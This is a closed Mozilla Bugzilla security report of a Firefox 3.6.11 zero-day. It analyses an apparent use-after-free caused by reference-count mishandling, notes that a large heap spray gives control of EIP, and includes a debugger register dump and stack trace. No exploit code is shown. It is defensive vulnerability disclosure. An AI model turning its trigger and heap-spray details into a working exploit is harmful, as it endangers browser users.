Closed
Bug 607412
Opened 14 years ago
Closed 14 years ago
0day - bug id 607222
Categories
(Firefox :: Security, defect)
Tracking
()
VERIFIED
DUPLICATE
of bug 607222
People
(Reporter: einar, Unassigned)
Details
(Whiteboard: [sg:dupe 607222])
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Build Identifier: Firefox 3.6.11
So the vulnerability appears to some kind of race condition issue in the handling of DOM element (tags) properties. The exploit enumerates all properties of the tags AUDIO, A, and BASE and sets them to 'a' one by one in a loop that spins may times. Unfortunately I'm not too familar with the Firefox code base, but my theory is that at some point in time, Firefox uses an object in two separate places, but only has incremented the object's reference count once. Consequently, when either part of the code is done with the object, the reference count reaches zero and the object is freed. This triggers a use-after-free condition upon subsequent use of the object, such as seen below. In order for an attacker to exploit this issue, a heap spray would need to be created in order to fill the freed memory. In this case, it appears that a very big heap spray (>1GB) is needed because of the high address. Hence, low memory machines would probably fail at running the exploit (I also had some initial problems reproducing in a VM due to low memory). However, this could probably be addressed which leads me to think that whoever made this exploit did not put much effort into it. I also believe the vulnerability was found by fuzzing as the author seems to just have bruteforced his way through all the properties until some strange application behavior was triggered. Btw, I replaced the heap spray with my own (just long strings of 'A's) and was able to hit EIP 0x41414141 without much effort, hence it seems to be highly exploitable.
0:000> r
eax=438a0ee0 ebx=00000000 ecx=038fdb80 edx=00000000 esi=0012ee78 edi=00000000
eip=100ec811 esp=0012e8c8 ebp=0012ea74 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
xul!XPCWrappedNative::GetNewOrUsed+0x21:
100ec811 8b08 mov ecx,dword ptr [eax] ds:0023:438a0ee0=????????
0:000> kb
ChildEBP RetAddr Args to Child
0012ea74 100f77eb 0012ee78 038fdb80 02ab9c80 xul!XPCWrappedNative::GetNewOrUsed+0x21 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcwrappednative.cpp @ 327]
0012eb0c 100f6e58 0012ecf0 0012ebe0 00000000 xul!XPCConvert::NativeInterface2JSObject+0x28b [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcconvert.cpp @ 1199]
0012ebac 100efe12 0012ecf0 0012ebe0 0012ec60 xul!XPCConvert::NativeData2JS+0x98 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcconvert.cpp @ 471]
0012ee48 100fc072 0012ee78 00000001 00000000 xul!XPCWrappedNative::CallMethod+0x5e2 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcwrappednative.cpp @ 2810]
0012ef14 00335c4d 02cc4000 02e93640 00000000 xul!XPC_WN_GetterSetter+0x1b2 [e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcwrappednativejsops.cpp @ 1784]
0012efc8 0032a533 02cc4000 00000000 03d3d0f0 js3250!js_Invoke+0x42d [e:\builds\moz2_slave\win32_build\build\js\src\jsinterp.cpp @ 1360]
0012effc 00337de0 02cc4000 02e93640 02e7a580 js3250!js_InternalInvoke+0x103 [e:\builds\moz2_slave\win32_build\build\js\src\jsinterp.cpp @ 1423]
0012f068 0033911a 02cc4000 02e93640 00000000 js3250!js_GetPropertyHelper+0x310 [e:\builds\moz2_slave\win32_build\build\js\src\jsobj.cpp @ 4275]
0012f2b4 003169c5 02cc4000 0012f364 01953090 js3250!js_Interpret+0x115a [e:\builds\moz2_slave\win32_build\build\js\src\jsops.cpp @ 1904]
0012f338 003041a1 02df8760 01953090 00000000 js3250!js_Execute+0x1a5 [e:\builds\moz2_slave\win32_build\build\js\src\jsinterp.cpp @ 1601]
0012f364 100606f3 02cc4000 02df8760 01c6f7e4 js3250!JS_EvaluateUCScriptForPrincipals+0x61 [e:\builds\moz2_slave\win32_build\build\js\src\jsapi.cpp @ 5073]
0012f3d8 1018230e 0012f4ac 02df8760 01c6f7e0 xul!nsJSContext::EvaluateString+0x15e [e:\builds\moz2_slave\win32_build\build\dom\base\nsjsenvironment.cpp @ 1764]
0012f490 10014d80 02e992b0 0012f4ac 02e992b0 xul!nsScriptLoader::EvaluateScript+0x177 [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptloader.cpp @ 711]
0012f544 1018f596 02e992b0 02e992b0 02beb5e4 xul!nsScriptLoader::ProcessRequest+0x6f [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptloader.cpp @ 625]
0012f8e4 100505ab 02beb5e4 02beb5e4 03d91c00 xul!nsScriptLoader::ProcessScriptElement+0x2e6 [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptloader.cpp @ 577]
0012f8fc 10014b17 03d91cbc 03d91c00 02beb5c0 xul!nsScriptElement::MaybeProcessScript+0x74 [e:\builds\moz2_slave\win32_build\build\content\base\src\nsscriptelement.cpp @ 193]
0012f9a8 10014af7 1004227f 00000001 02e99370 xul!nsHTMLScriptElement::MaybeProcessScript+0x1d [e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlscriptelement.cpp @ 565]
0012f9ac 1004227f 00000001 02e99370 00000000 xul!nsHTMLScriptElement::DoneAddingChildren+0xc [e:\builds\moz2_slave\win32_build\build\content\html\content\src\nshtmlscriptelement.cpp @ 490]
0012f9c4 1009c49d 02beb5e4 00000000 03d56380 xul!HTMLContentSink::ProcessSCRIPTEndTag+0x63 [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 3116]
0012f9e4 1009bce2 00000053 00000000 00000000 xul!SinkContext::CloseContainer+0x11d [e:\builds\moz2_slave\win32_build\build\content\html\document\src\nshtmlcontentsink.cpp @ 1018]
Reproducible: Always
Actual Results:
see details
see details
|
||
Updated•14 years ago
|
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 607222]
|
|
||
Comment 2•14 years ago
|
||
Einar, I was just replying to your e-mail. I'll follow-up there.
|
|
||
Updated•14 years ago
|
Group: core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•